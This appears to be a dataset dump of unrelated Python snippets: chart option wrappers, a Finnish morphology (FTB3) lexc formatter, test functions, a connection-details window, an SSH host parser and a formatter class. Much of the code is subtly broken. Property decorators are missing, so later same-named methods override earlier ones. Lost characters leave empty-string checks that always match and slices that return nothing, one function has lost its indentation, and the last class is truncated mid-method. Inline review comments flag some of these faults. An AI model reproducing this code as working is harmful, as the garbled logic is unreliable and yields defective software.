code stringlengths 281 23.7M |
|---|
class OptionSeriesXrangeLabel(Options):
    """Option accessors for X-range series data labels (Highcharts-style wrapper).

    NOTE(review): every option below appears as two same-named defs
    (getter, then setter). The @property / @<name>.setter decorators
    appear to have been stripped during extraction — as written, each
    later def silently overrides the earlier one. Confirm against the
    generator that produced this file.
    """
    def boxesToAvoid(self):
        # Default: undefined (no boxes to route labels around).
        return self._config_get(None)
    def boxesToAvoid(self, value: Any):
        self._config(value, js_type=False)
    def connectorAllowed(self):
        # Default: connectors between point and label are disallowed.
        return self._config_get(False)
    def connectorAllowed(self, flag: bool):
        self._config(flag, js_type=False)
    def connectorNeighbourDistance(self):
        # Default spacing (px) considered when routing connectors.
        return self._config_get(24)
    def connectorNeighbourDistance(self, num: float):
        self._config(num, js_type=False)
    def enabled(self):
        return self._config_get(True)
    def enabled(self, flag: bool):
        self._config(flag, js_type=False)
    def format(self):
        # Default is the literal string 'undefined' (mirrors JS docs).
        return self._config_get('undefined')
    def format(self, text: str):
        self._config(text, js_type=False)
    def formatter(self):
        return self._config_get('undefined')
    def formatter(self, value: Any):
        self._config(value, js_type=False)
    def maxFontSize(self):
        return self._config_get(None)
    def maxFontSize(self, num: float):
        self._config(num, js_type=False)
    def minFontSize(self):
        return self._config_get(None)
    def minFontSize(self, num: float):
        self._config(num, js_type=False)
    def onArea(self):
        return self._config_get(None)
    def onArea(self, flag: bool):
        self._config(flag, js_type=False)
    def style(self) -> 'OptionSeriesXrangeLabelStyle':
        # Nested sub-options object for label CSS styling.
        return self._config_sub_data('style', OptionSeriesXrangeLabelStyle)
    def useHTML(self):
        return self._config_get(False)
    def useHTML(self, flag: bool):
        self._config(flag, js_type=False)
class Ftb3Formatter(Formatter):
multichars = {'% A', '% V', '% N', '% Part', '% Abbr', '% Pron', '% Num', '% Prop', '% Interj', '% Dem', '% Interr', '% Rel', '% Qnt', '% Refl', '% N% Abbr', '% %>%>%>', '% CS', '% CC', '% Adv', '% Adp', '% Po', '% Pr', '% Adp% Po', '% Adp% Pr', '% Punct', '% Quote', '% EmDash', '% EnDash', '% Dash', '% Digit', '% Roman', '% Nom', '% Par', '% Gen', '% Ine', '% Ela', '% Ill', '% Ade', '% Abl', '% All', '% Ess', '% Ins', '% Abe', '% Tra', '% Com', '% Lat', '% Acc', '% Sg', '% Pl', '% PxSg1', '% PxSg2', '% PxPl1', '% PxPl2', '% PxPl3', '% Px3', '% TrunCo', 'TrunCo% ', '% TruncPrefix', 'TruncSuffix% ', '% Prt', '% Prs', '% Pst', '% Cond', '% Pot', '% Impv', '% Opt', '% Sg1', '% Sg2', '% Sg3', '% Pl1', '% Pl2', '% Pl3', '% Pe4', '% ConNeg', '% Neg', '% Act', '% Pass', '% Inf1', '% Inf2', '% Inf3', '% Inf5', '% PrsPrc', '% PrsPrc% Act', '% PrsPrc% Pass', '% PrfPrc', '% PrfPrc% Act', '% PrfPrc% Pass', '% AgPrc', '% NegPrc', '% Pos', '% Comp', '% Superl', '% Dem', '% Qnt', '% Pers', '% Indef', '% Interr', '% Refl', '% Rel', '% Ord', '% Foc%_hAn', '% Foc%_kAAn', '% Foc%_kin', '% Foc%_kO', '% Foc%_pA', '% Foc%_s', '% Foc%_kA', '% Man', '% Forgn', '%<Del%>', '%<Del%>'}
stuff2ftb3 = {'Bc': '#', '.sent': '', '.': '.', 'Aa': '', 'Aan': '', 'ABBREVIATION': '% Abbr', 'ABESSIVE': '% Abe', 'ABLATIVE': '% Abl', 'ACRONYM': '% N% Abbr', 'ADESSIVE': '% Ade', 'ADJ': '% A', 'ADJECTIVE': '% A', 'ADP': '% Adp% Po', 'ADV': '% Adv', 'ADVERBIAL': '', 'Aen': '', 'Ahan': '', 'Ahen': '', 'Ahin': '', 'Ahon': '', 'Ahun': '', 'Ahyn': '', 'Ahan': '', 'Ahon': '', 'Aia': '', 'Aiden': '', 'Aien': '', 'Aihin': '', 'Aiin': '', 'Ain': '', 'Aisiin': '', 'Aita': '', 'Aitten': '', 'Aita': '', 'Aia': '', 'Aja': '', 'Ajen': '', 'Aja': '', 'ALLATIVE': '% All', 'Ana': '', 'Aon': '', 'ARROW': '', 'Asa': '', 'Aseen': '', 'Ata': '', 'Aten': '', 'Ata': '', 'Aun': '', 'Ayn': '', 'Aa': '', 'Aan': '', 'Aon': '', 'B-': '% TrunCo', 'B': '% TrunCo', 'B': 'TrunCo% ', 'CARDINAL': '', 'ORDINAL': '% Ord', 'Ccmp': '% Comp', 'CLAUSE-BOUNDARY': '', 'Cma': '% AgPrc', 'Cmaisilla': '% Adv', 'Cmaton': '% NegPrc', 'Cnut': '% PrfPrc', 'COMMA': '', 'COMPARATIVE': '', 'COMP': '% Comp', 'CONJ': '% CC', 'COORDINATING': '', 'Cpos': '% Pos', 'Csup': '% Superl', 'Cva': '% PrsPrc', 'DASH': '% Dash', 'DECIMAL': '', 'DEMONSTRATIVE': '% Dem', 'DERSTI': '', 'DERTTAIN': '', 'DIGIT': '% Digit', 'Din': '', 'Dinen': '', 'Dja': '', 'Dma': '% AgPrc', 'Dmaisilla': '% Inf5', 'Dmaton': '% NegPrc', 'Dminen': '% N', 'Dmpi': '', 'Dhko': '', 'Dtar': '', 'Dnen': '', 'Dlainen': '% N', 'Disa': '% N', 'Dton': '% A', 'Dllinen': '% A', 'Cmainen': '% A', 'Dmainen': '% A', 'Dnut': '% PrfPrc% Act', 'Ds': '', 'Dsti': '', 'Dtattaa': '', 'Dtuttaa': '', 'Dtatuttaa': '', 'Dtava': '% PrsPrc% Pass', 'Dttaa': '', 'Dttain': '', 'Dtu': '% PrfPrc% Pass', 'Du': '', 'Duus': '', 'Dva': '% PrsPrc% Act', 'ELATIVE': '% Ela', 'FINAL-BRACKET': '', 'FINAL-QUOTE': '% Quote', 'FRACTION': '', 'FTB3man': '% Man', 'FTB3MAN': '% Man', 'GENITIVE': '% Gen', 'Ia': '% Inf1', 'Ie': '% Inf2', 'ILLATIVE': '% Ill', 'Ima': '% Inf3', 'Iminen': '% N', 'INDEFINITE': '% Indef', 'INESSIVE': '% Ine', 'INITIAL-BRACKET': '', 'INITIAL-QUOTE': '% Quote', 
'INSTRUCTIVE': '% Man', 'INTERROGATIVE': '% Interr', 'INTJ': '% Interj', 'LATIVE': '% Lat', 'LEMMA-END': '', 'LEMMA-START': '', 'LOCATIVE': '% Ess', 'MULTIPLICATIVE': '', 'Ncon': '% ConNeg', 'Nneg': '% Neg', 'NOUN': '% N', 'Npl': '% Pl', 'N??': '% Sg', 'Nsg': '% Sg', 'NUMERAL': '% Num', 'NUM': '% Num', 'O3': '% Px3', 'Opl1': '% PxPl1', 'Opl2': '% PxPl2', 'Osg1': '% PxSg1', 'Osg2': '% PxSg2', 'PARTICLE': '% Part', 'PARTITIVE': '% Par', 'PE4': '% Pe4', 'PERSONAL': '% Pers', 'PL1': '% Pl1', 'PL2': '% Pl2', 'PL3': '% Pl3', 'Ppe4': '% Pe4', 'Ppl1': '% Pl1', 'Ppl2': '% Pl2', 'Ppl3': '% Pl3', 'PREPOSITION': '% Adp% Pr', 'PRONOUN': '% Pron', 'PRON': '% Pron', 'PROPER': '% Prop', 'Psg1': '% Sg1', 'Psg2': '% Sg2', 'Psg3': '% Sg3', 'PUNCTUATION': '% Punct', 'Qhan': '% Foc%_hAn', 'Qkaan': '% Foc%_kAAn', 'Qka': '% Foc%_kA', 'Qkin': '% Foc%_kin', 'Qko': '% Foc%_kO', 'Qpa': '% Foc%_pA', 'Qs': '% Foc%_s', 'QUALIFIER': '% A', 'QUANTIFIER': '% Qnt', 'QUANTOR': '% Qnt', 'RECIPROCAL': '', 'REFLEXIVE': '% Refl', 'RELATIVE': '% Rel', 'ROMAN': '% Roman', 'SCONJ': '% CS', 'SENTENCE-BOUNDARY': '', 'SEPARATIVE': '% Par', 'SG1': '% Sg1', 'SG2': '% Sg2', 'SG3': '% Sg3', 'SPACE': '', 'SUFFIX': '', 'SUPERL': '% Superl', 'Tcond': '% Cond', 'Timp': '% Impv', 'Topt': '% Opt', 'Tpast': '% Pst', 'Tpot': '% Pot', 'Tpres': '% Prs', 'Uarch': '', 'Udial': '', 'Unonstd': '', 'UNSPECIFIED': '% Adv', 'Urare': '', 'Vact': '% Act', 'VERB': '% V', 'Vpss': '% Pass', 'X': '', 'Xabe': '% Abe', 'Xabl': '% Abl', 'Xacc': '% Acc', 'Xade': '% Ade', 'Xall': '% All', 'Xcom': '% Com', 'Xela': '% Ela', 'Xess': '% Ess', 'XForeign': '% Forgn', 'Xgen': '% Gen', 'Xill': '% Ill', 'Xine': '% Ine', 'Xins': '% Ins', 'Xlat': '% Lat', 'X???': '% Nom', 'Xnom': '% Nom', 'Xpar': '% Par', 'Xtra': '% Tra', '': ''}
def __init__(self, verbose=True):
    """Validate the stuff→FTB3 mapping against the declared multichar set.

    :param verbose: when True, later lookups warn about analyses that
        have no FTB3 formatting defined.
    """
    self.verbose = verbose
    fail = False
    for (stuff, ftb3) in self.stuff2ftb3.items():
        if (len(ftb3) < 2):
            # Short (single-char / empty) strings need not be declared
            # as multichar symbols.
            continue
        elif (ftb3 not in self.multichars):
            just_fail((((('There are conflicting formattings in here!\n' + ftb3) + ' for ') + stuff) + ' is not a valid defined ftb3 multichar_symbol!'))
            fail = True
    if fail:
        # NOTE(review): tainted is only set on failure and never
        # initialised to False here — confirm the base class does so.
        self.tainted = True
def stuff2lexc(self, stuff):
    """Translate one internal analysis tag to its FTB3 lexc string.

    Returns '' (and optionally warns) for unknown tags.
    """
    if (stuff == '0'):
        # '0' passes through unchanged.
        return '0'
    elif (stuff in self.stuff2ftb3):
        return self.stuff2ftb3[stuff]
    else:
        if self.verbose:
            fail_formatting_missing_for(stuff, 'ftb3.1')
        return ''
def analyses2lexc(self, anals, surf):
    """Render a '|'-separated analysis string as an FTB3 tag string.

    First applies FTB3-specific rewrites (negation, infinitive and
    participle special cases), then reorders the tags before rendering
    each through stuff2lexc().

    :param anals: analysis tags joined by '|'.
    :param surf: surface string (substituted for a bare '-' analysis).
    """
    ftbstring = ''
    # FTB3 rewrite rules: collapse/replace combinations that FTB3
    # encodes differently from the internal representation.
    if ('Nneg|Vact' in anals):
        anals = anals.replace('|Vact', '')
    elif (anals == 'Vact|Ia|Xlat'):
        anals = 'Ia|Xlat'
    elif (anals == 'Vact|Ima|Xins'):
        anals = 'Ima|FTB3man'
    elif ('Vact|Ima' in anals):
        anals = anals.replace('Vact|', '')
    elif (anals == 'Vact|Ie|Nsg|Xins'):
        anals = 'Ie|Vact|FTB3man'
    elif (anals == 'Vact|Tpres|Ppe4|Ncon'):
        anals = 'Vact|Tpres|Ncon'
    elif (anals == 'Vpss|Tpres|Ppe4|Ncon'):
        anals = 'Vpss|Tpres|Ncon'
    elif ('Dmaton' in anals):
        anals = anals.replace('Dmaton', 'Cmaton')
    elif ('Dma' in anals):
        anals = anals.replace('Dma', 'Cma')
    parts = anals.split('|')
    reordered = []
    # NOTE(review): startswith('') is vacuously True, so this first pass
    # copies every part, and the final filter below excludes everything
    # for the same reason — a non-empty prefix string was most likely
    # lost in extraction. The subsequent passes then append I/T/C/V/X
    # parts a second time. Confirm the intended ordering upstream.
    for part in parts:
        if part.startswith(''):
            reordered.append(part)
    for part in parts:
        if part.startswith('I'):
            reordered.append(part)
    for part in parts:
        if part.startswith('T'):
            reordered.append(part)
        elif part.startswith('C'):
            reordered.append(part)
    for part in parts:
        if part.startswith('V'):
            reordered.append(part)
    for part in parts:
        if part.startswith('X'):
            reordered.append(part)
    parts = [x for x in parts if ((not x.startswith('X')) and (not x.startswith('T')) and (not x.startswith('C')) and (not x.startswith('I')) and (not x.startswith('V')) and (not x.startswith('')))]
    for part in parts:
        reordered.append(part)
    for anal in reordered:
        if (anal == '-'):
            # A bare hyphen stands for the (escaped) surface form.
            ftbstring += lexc_escape(surf)
        elif (anal.startswith('') and anal.endswith('')):
            # NOTE(review): both tests are vacuously True and the slice
            # anal[len(''):(-len(''))] is anal[0:0] == '' — this branch
            # appends nothing and makes the else unreachable. Delimiter
            # characters were likely lost in extraction; confirm.
            ftbstring += lexc_escape(anal[len(''):(- len(''))])
        else:
            ftbstring += self.stuff2lexc(anal)
    return ftbstring
def continuation2lexc(self, anals, surf, cont):
    """Format one lexc continuation entry: 'analysis:surface<TAB>CONT ;'."""
    ftbstring = self.analyses2lexc(anals, surf)
    if ('COMPOUND' in cont):
        # For compound continuations, the analysis side is the surface
        # form with morph/derivation boundary markers removed.
        ftbstring = surf.replace(morph_boundary, '').replace(deriv_boundary, '')
    surf = lexc_escape(surf)
    return ('%s:%s\t%s ;\n' % (ftbstring, surf, cont))
def wordmap2lexc(self, wordmap):
    """Format one wordmap (lexicon entry dict) as FTB3 lexc line(s).

    Mutates wordmap in place ('stub', 'analysis', possibly 'prontype')
    and returns the joined lexc lines, or '' for an unrepresentable
    entry (a lone space).
    """
    if (wordmap['stub'] == ' '):
        # A bare space has no lexc representation.
        return ''
    wordmap['stub'] = lexc_escape(wordmap['stub'].replace(word_boundary, optional_hyphen))
    wordmap['analysis'] = ('%s' % lexc_escape((wordmap['bracketstub'].replace(word_boundary, '#') + '<Del>')))
    if (((wordmap['pos'] == 'ACRONYM') and ((len(wordmap['stub']) == 1) and (not wordmap['stub'].isalpha()))) or (wordmap['stub'] == '')):
        # Single non-alphabetic "acronyms" are treated as punctuation.
        wordmap['analysis'] += self.stuff2lexc('PUNCTUATION')
    elif (wordmap['pos'] in ['NOUN', 'VERB', 'ADJECTIVE', 'PRONOUN', 'NUMERAL', 'ACRONYM', 'PUNCTUATION', 'SUFFIX']):
        wordmap['analysis'] += self.stuff2lexc(wordmap['pos'])
    elif (wordmap['pos'] == 'CONJUNCTIONVERB'):
        if (wordmap['lemma'] == 'eika'):
            # Negation conjunction: rebuilt from the lemma itself.
            wordmap['analysis'] = ((wordmap['lemma'] + self.stuff2lexc('CONJ')) + self.stuff2lexc('Nneg'))
        else:
            wordmap['analysis'] += (self.stuff2lexc('ADVERBIAL') + self.stuff2lexc('Nneg'))
    elif (wordmap['pos'] == 'PARTICLE'):
        if (wordmap['upos'] in ['CONJ', 'SCONJ', 'INTJ', 'ADV', 'ADP']):
            wordmap['analysis'] += self.stuff2lexc(wordmap['upos'])
        else:
            wordmap['analysis'] += self.stuff2lexc('PARTICLE')
    elif (wordmap['pos'] == 'PROPN'):
        # NOTE(review): proper nouns only print a debug marker here and
        # add no analysis — confirm whether this is intentional.
        print('???', wordmap)
    elif (wordmap['pos'] == 'X'):
        wordmap['analysis'] += self.stuff2lexc('NOUN')
    else:
        fail_guess_because(wordmap, [], ['PARTICLE', 'PROPN', 'NOUN', 'VERB', 'ADJECTIVE', 'PRONOUN', 'NUMERAL', 'ACRONYM', 'PUNCTUATION'], 'not in FTB3 known poses or particle!')
        exit(1)
    if wordmap['prontype']:
        if ('PERSONAL' in wordmap['prontype']):
            # Collapse any combination containing PERSONAL to just it.
            wordmap['prontype'] = 'PERSONAL'
        for stuff in wordmap['prontype'].split('|'):
            wordmap['analysis'] += self.stuff2lexc(stuff)
    if wordmap['lex']:
        for stuff in wordmap['lex'].split('|'):
            wordmap['analysis'] += self.stuff2lexc(stuff)
    if wordmap['abbr']:
        for stuff in wordmap['abbr'].split('|'):
            wordmap['analysis'] += self.stuff2lexc(stuff)
    if wordmap['numtype']:
        for stuff in wordmap['numtype'].split('|'):
            wordmap['analysis'] += self.stuff2lexc(stuff)
    if wordmap['is_proper']:
        wordmap['analysis'] += self.stuff2lexc('PROPER')
    if wordmap['symbol']:
        for subcat in wordmap['symbol'].split('|'):
            wordmap['analysis'] += self.stuff2lexc(subcat)
    if (wordmap['lemma'] == ''):
        # NOTE(review): str.replace() returns a new string that is
        # discarded here, and both lemma comparisons test '' — the dash
        # lemma characters were likely lost in extraction. Confirm.
        wordmap['analysis'].replace('Dash', 'EnDash')
    if (wordmap['lemma'] == ''):
        wordmap['analysis'].replace('Dash', 'EmDash')
    lex_stub = wordmap['stub']
    retvals = []
    if ('BLACKLIST' in wordmap['new_para']):
        # Blacklisted paradigms are emitted commented out ('!').
        retvals += [('! ! !%s:%s\t%s\t;' % (wordmap['analysis'], lex_stub, wordmap['new_para']))]
    else:
        retvals += [('%s:%s\t%s\t;' % (wordmap['analysis'], lex_stub, wordmap['new_para']))]
    if (wordmap['lemma'] in ['-', '', '', '(']):
        # Extra entry carrying the compound-boundary marker %>%>%>.
        retvals += [('%s%% %%>%%>%%>:%s\t%s\t;' % (wordmap['analysis'], lex_stub, wordmap['new_para']))]
    return '\n'.join(retvals)
def multichars_lexc(self):
    """Render the Multichar_Symbols section, listing the FTB3 set first
    and then whatever the base Formatter contributes."""
    multichars = 'Multichar_Symbols\n'
    multichars += '!! FTB 3.1 multichar set:\n'
    for mcs in self.multichars:
        multichars += (mcs + '\n')
    multichars += Formatter.multichars_lexc(self)
    return multichars
def root_lexicon_lexc(self):
    """Extend the base root lexicon with hyphen-compound entries."""
    root = Formatter.root_lexicon_lexc(self)
    if True:
        # NOTE(review): 'if True' reads like a condition whose test was
        # lost in extraction (possibly an option flag) — confirm.
        root += '!! LEXICONS that can be co-ordinated hyphen -compounds\n'
        root += (self.stuff2lexc('B') + ':- NOUN ;\n')
        root += (self.stuff2lexc('B') + ':- ADJ ;\n')
        root += (self.stuff2lexc('B') + ':- SUFFIX ;\n')
    return root
class OptionPlotoptionsHeatmapStatesSelect(Options):
    """Options for the 'select' state of heatmap series points.

    NOTE(review): same-named getter/setter defs — the property
    decorators appear stripped during extraction (see the sibling
    Option classes); confirm against the generated original.
    """
    def animation(self) -> 'OptionPlotoptionsHeatmapStatesSelectAnimation':
        # Nested sub-options: animation of the state change.
        return self._config_sub_data('animation', OptionPlotoptionsHeatmapStatesSelectAnimation)
    def enabled(self):
        return self._config_get(True)
    def enabled(self, flag: bool):
        self._config(flag, js_type=False)
    def halo(self) -> 'OptionPlotoptionsHeatmapStatesSelectHalo':
        return self._config_sub_data('halo', OptionPlotoptionsHeatmapStatesSelectHalo)
    def lineWidth(self):
        return self._config_get(None)
    def lineWidth(self, num: float):
        self._config(num, js_type=False)
    def lineWidthPlus(self):
        # Default: line width grows by 1px in the select state.
        return self._config_get(1)
    def lineWidthPlus(self, num: float):
        self._config(num, js_type=False)
    def marker(self) -> 'OptionPlotoptionsHeatmapStatesSelectMarker':
        return self._config_sub_data('marker', OptionPlotoptionsHeatmapStatesSelectMarker)
class OptionSeriesDumbbellSonificationDefaultspeechoptionsMappingRate(Options):
    """Speech-rate mapping options for dumbbell series sonification.

    NOTE(review): same-named getter/setter defs — the property
    decorators appear stripped during extraction; confirm.
    """
    def mapFunction(self):
        return self._config_get(None)
    def mapFunction(self, value: Any):
        self._config(value, js_type=False)
    def mapTo(self):
        # Data property the rate is mapped from.
        return self._config_get(None)
    def mapTo(self, text: str):
        self._config(text, js_type=False)
    def max(self):
        return self._config_get(None)
    def max(self, num: float):
        self._config(num, js_type=False)
    def min(self):
        return self._config_get(None)
    def min(self, num: float):
        self._config(num, js_type=False)
    def within(self):
        return self._config_get(None)
    def within(self, value: Any):
        self._config(value, js_type=False)
class _Nothing(Type):
    """The empty type: contains no values.

    Absorbing element for intersection/subtraction, identity for
    union/xor.
    """
    def __init__(self):
        pass
    def __and__(self, other):
        # Nothing & X == Nothing
        return self
    def __or__(self, other):
        # Nothing | X == X
        return other
    def __sub__(self, other):
        # Nothing - X == Nothing
        return self
    def __xor__(self, other):
        # Nothing ^ X == X (no overlap to cancel)
        return other
    def __invert__(self):
        # Complement of the empty type is the universal type.
        return tAll
    def __repr__(self):
        return 'tNothing'
    def __contains__(self, value):
        # No value is a member of the empty type.
        return False
    def __call__(self, *values):
        # Type-check: nothing ever matches.
        return False
    def __iter__(self):
        # NOTE(review): returns None, which is not a valid iterator —
        # iterating an instance raises TypeError. An empty generator
        # may have been intended; confirm upstream.
        pass
    # PNML serialization: domain tag for the empty type.
    __pnmltype__ = 'empty'
    def __pnmldump__(self):
        return Tree(self.__pnmltag__, None, domain=self.__pnmltype__)
    def __pnmlload__(cls, tree):
        # NOTE(review): first parameter is `cls` — looks like a
        # @classmethod whose decorator was stripped in extraction;
        # confirm against the original source.
        return cls()
def test_action_monitoring():
    """Check that action logging records one event per sub-action and
    tags each with the event interface matching its action-space type
    (discrete / continuous / multi-binary)."""
    env = build_dummy_maze_env()
    env = MazeEnvMonitoringWrapper.wrap(env, observation_logging=False, action_logging=True, reward_logging=False)
    env = LogStatsWrapper.wrap(env)
    env.reset()
    for ii in range(2):
        env.step(env.action_space.sample())
    # Query events recorded for the most recent step only.
    action_events = env.get_last_step_events(query=[ActionEvents.discrete_action, ActionEvents.continuous_action, ActionEvents.multi_binary_action])
    # The dummy env's action space flattens to exactly 7 sub-actions.
    assert (len(action_events) == 7)
    for event in action_events:
        if (event.attributes['name'] in ['action_0_0', 'action_0_1_0', 'action_0_1_1', 'action_1_0']):
            assert (event.interface_method == ActionEvents.discrete_action)
        elif (event.attributes['name'] in ['action_0_2', 'action_2_0']):
            assert (event.interface_method == ActionEvents.continuous_action)
        elif (event.attributes['name'] in ['action_1_1']):
            assert (event.interface_method == ActionEvents.multi_binary_action)
        else:
            # Unknown sub-action name: the wrapper logged something
            # unexpected.
            raise ValueError
class ConnDetails(InfoWindow):
    """Info window displaying the details of one recorded connection."""
    def __init__(self, parent):
        super().__init__(parent)
        self._db = Database.instance()
        self._nodes = Nodes.instance()

    def showByField(self, field, value):
        """Look up the first connection where `field` equals `value`
        and render its details as HTML in the window; no-op when there
        is no match."""
        records = self._db.get_connection_by_field(field, value)
        if (not records.next()):
            # No matching record — nothing to show.
            return
        node = records.value(ConnFields.Node)
        uid = records.value(ConnFields.UID)
        if self._nodes.is_local(node):
            # Resolve the numeric UID to a user name for local nodes.
            uid = Utils.get_user_id(uid)
        conn_text = QC.translate('stats', '\n<b>{0}</b><br><br>\n<b>Time:</b> {1}<br><br>\n<b>Process:</b><br>{2}<br>\n<b>Cmdline:</b><br>{3}<br>\n<b>CWD:</b><br>{4}<br><br>\n<b>UID:</b> {5} <b>PID:</b> {6}<br>\n<br>\n<b>Node:</b> {7}<br><br>\n<b>{8}</b> {9}:{10} -> {11} ({12}):{13}\n<br><br>\n<b>Rule:</b><br>\n{14}\n'.format(records.value(ConnFields.Action).upper(), records.value(ConnFields.Time), records.value(ConnFields.Process), records.value(ConnFields.Cmdline), records.value(ConnFields.CWD), uid, records.value(ConnFields.PID), node, records.value(ConnFields.Protocol).upper(), records.value(ConnFields.SrcPort), records.value(ConnFields.SrcIP), records.value(ConnFields.DstIP), records.value(ConnFields.DstHost), records.value(ConnFields.DstPort), records.value(ConnFields.Rule)))
        self.showText(conn_text)
def derive_shorthand(host_string):
    """Parse an SSH-style host shorthand ``[user@]host[:port]``.

    Splits on the last ``@`` to separate an optional user, then on the
    last ``:`` for an optional port. A host containing more than one
    ``:`` (a bare IPv6 address) is kept whole and gets no port.

    :param host_string: shorthand such as ``"deploy@example.com:2222"``.
    :returns: dict with keys ``'user'``, ``'host'``, ``'port'`` — port
        as an int, absent pieces as ``None``.
    """
    # Bug fix: the separator was the empty string, which makes
    # str.rsplit raise "ValueError: empty separator"; the intended
    # user/host delimiter is '@'.
    user_hostport = host_string.rsplit('@', 1)
    hostport = user_hostport.pop()
    user = (user_hostport[0] if (user_hostport and user_hostport[0]) else None)
    if (hostport.count(':') > 1):
        # More than one colon: bare IPv6 address, no port component.
        host = hostport
        port = None
    else:
        host_port = hostport.rsplit(':', 1)
        host = (host_port.pop(0) or None)
        port = (host_port[0] if (host_port and host_port[0]) else None)
    if (port is not None):
        port = int(port)
    return {'user': user, 'host': host, 'port': port}
class Client():
    """Lightweight client stub bundling the service sub-APIs.

    ``info`` is wrapped so that calling :meth:`info` yields the given
    payload; ``transport`` is only set when a transport client is
    supplied.
    """

    def __init__(self, *, nodes=None, info=None, indices=None, transform=None, cluster=None, transport_client=None, is_serverless=None):
        # Sub-API handles (independent of each other; order is arbitrary).
        self.indices = indices
        self.cluster = cluster
        self.nodes = nodes
        self.transform = transform
        self.is_serverless = is_serverless
        self._info = wrap(info)
        # Leave the attribute unset entirely when no transport is given.
        if transport_client:
            self.transport = transport_client

    def info(self):
        """Return the wrapped info payload."""
        return self._info()

    def perform_request(self, *args, **kwargs):
        """Delegate a raw request to the underlying transport."""
        return self.transport.perform_request(*args, **kwargs)
def test_pca_bedgraph_lieberman():
    """End-to-end hicPCA run: bedgraph output with the 'lieberman'
    method must match the reference eigenvector tracks."""
    pca1 = NamedTemporaryFile(suffix='.bedgraph', delete=False)
    pca2 = NamedTemporaryFile(suffix='.bedgraph', delete=False)
    # Close immediately; hicPCA re-opens the paths for writing.
    pca1.close()
    pca2.close()
    matrix = (ROOT + 'small_test_matrix_50kb_res.h5')
    args = '--matrix {} --outputFileName {} {} -f bedgraph --whichEigenvectors 1 2 --method lieberman'.format(matrix, pca1.name, pca2.name).split()
    hicPCA.main(args)
    assert are_files_equal((ROOT + 'hicPCA/pca1.bedgraph'), pca1.name)
    assert are_files_equal((ROOT + 'hicPCA/pca2.bedgraph'), pca2.name)
    # Clean up the delete=False temp files.
    os.unlink(pca1.name)
    os.unlink(pca2.name)
def extractGodcomplextranslationsWordpressCom(item):
    """Map a godcomplextranslations.wordpress.com feed item to a release.

    Returns None for non-chapter/preview items, a release message when a
    known tag matches, and False otherwise.
    """
    vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
    if not (chp or vol) or 'preview' in item['title'].lower():
        return None
    # (tag to match, series name, translation type)
    tagmap = [
        ('shepherding humanity', 'shepherding humanity', 'translated'),
        ('PRC', 'PRC', 'translated'),
        ('Loiterous', 'Loiterous', 'oel'),
    ]
    for tagname, name, tl_type in tagmap:
        if tagname in item['tags']:
            return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
    return False
def test_image_from_flytectl_config():
    """ImageConfig.auto must pick up images from the file named by the
    FLYTECTL_CONFIG environment variable when no config_file is given."""
    os.environ['FLYTECTL_CONFIG'] = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'configs/sample.yaml')
    image_config = ImageConfig.auto(config_file=None)
    assert (image_config.images[0].full == 'docker.io/xyz:latest')
    # NOTE(review): 'docker.io/abc:None' suggests the sample config has
    # no tag for this image and None is stringified — confirm intent.
    assert (image_config.images[1].full == 'docker.io/abc:None')
def set_location(sym, loc):
    """Record *loc* as the '#source_location' sub-irep of *sym*.

    File is always set; line and column attributes are added only when
    the corresponding fields of *loc* are present.
    """
    assert isinstance(sym, goto_ast.Irep)
    assert isinstance(loc, Location)
    src_loc = goto_ast.Irep('')
    src_loc.set_attribute('file', loc.filename)
    if loc.line is not None:
        src_loc.set_attribute('line', str(loc.line))
    if loc.col_start is not None:
        # Column is encoded as a "start:end" pair.
        src_loc.set_attribute('column', '%u:%u' % (loc.col_start, loc.col_end))
    sym.named_sub['#source_location'] = src_loc
def crawl_tree_and_set_ratios(result):
for field in result:
if (field in ['ratio', 'count', 'stats']):
continue
total = result[field]['total']
for value in result[field]:
if (value == 'total'):
continue
result[field][value]['ratio'] = (result[field][value]['count'] / total)
crawl_tree_and_set_ratios(result[field][value]) |
class TestApi(unittest.TestCase):
    """Smoke tests: every public name in traitsui.testing.api imports.

    Each test only performs the import; an ImportError fails the test.
    """
    def test_tester_import(self):
        from traitsui.testing.api import UITester
    def test_commands_imports(self):
        from traitsui.testing.api import MouseClick, KeyClick, KeySequence
    def test_query_imports(self):
        from traitsui.testing.api import DisplayedText, IsChecked, IsEnabled, IsVisible, SelectedText
    def test_locator_imports(self):
        from traitsui.testing.api import Index, TargetById, TargetByName, Textbox, Slider
    def test_advanced_usage_imports(self):
        from traitsui.testing.api import TargetRegistry
    def test_exceptions_imports(self):
        from traitsui.testing.api import Disabled, InteractionNotSupported, LocationNotSupported, TesterError
class OptionPlotoptionsWaterfallSonificationTracksPointgrouping(Options):
    """Point-grouping options for waterfall sonification tracks.

    NOTE(review): same-named getter/setter defs — the property
    decorators appear stripped during extraction; confirm.
    """
    def algorithm(self):
        # Default grouping algorithm.
        return self._config_get('minmax')
    def algorithm(self, text: str):
        self._config(text, js_type=False)
    def enabled(self):
        return self._config_get(True)
    def enabled(self, flag: bool):
        self._config(flag, js_type=False)
    def groupTimespan(self):
        # Default grouping window (milliseconds per the JS docs).
        return self._config_get(15)
    def groupTimespan(self, num: float):
        self._config(num, js_type=False)
    def prop(self):
        # Point property the grouping operates on; defaults to 'y'.
        return self._config_get('y')
    def prop(self, text: str):
        self._config(text, js_type=False)
class Formatter(GObject.GObject):
    """Template-string formatter exposed as a GObject with a 'format'
    property.

    Placeholders in the template may carry a parameter list (e.g.
    ``${name:prefix=..., pad=2}``); see :meth:`extract` for parsing and
    :meth:`format` for substitution with prefix/suffix/padding support.
    """
    __gproperties__ = {'format': (GObject.TYPE_STRING, 'format string', 'String the formatting is based on', '', GObject.ParamFlags.READWRITE)}

    def __init__(self, format):
        GObject.GObject.__init__(self)
        # _template parses the format string; _substitutions maps an
        # identifier (or 'identifier:params' key) to a value/callable.
        self._template = ParameterTemplate(format)
        self._substitutions = {}

    def do_get_property(self, property):
        if (property.name == 'format'):
            return self._template.template
        else:
            raise AttributeError(('unknown property %s' % property.name))

    def do_set_property(self, property, value):
        if (property.name == 'format'):
            # Only update when the template actually changed.
            if (value != self._template.template):
                self._template.template = value
        else:
            raise AttributeError(('unknown property %s' % property.name))

    # Maps 'identifier[:raw-params]' -> (identifier, {param: value}).
    Extractions = Dict[(str, Tuple[(str, Dict[(str, Union[(bool, str)])])])]

    def extract(self) -> Extractions:
        """Parse the template and return its placeholders with their
        parameter dictionaries."""
        matches = self._template.pattern.finditer(self._template.template)
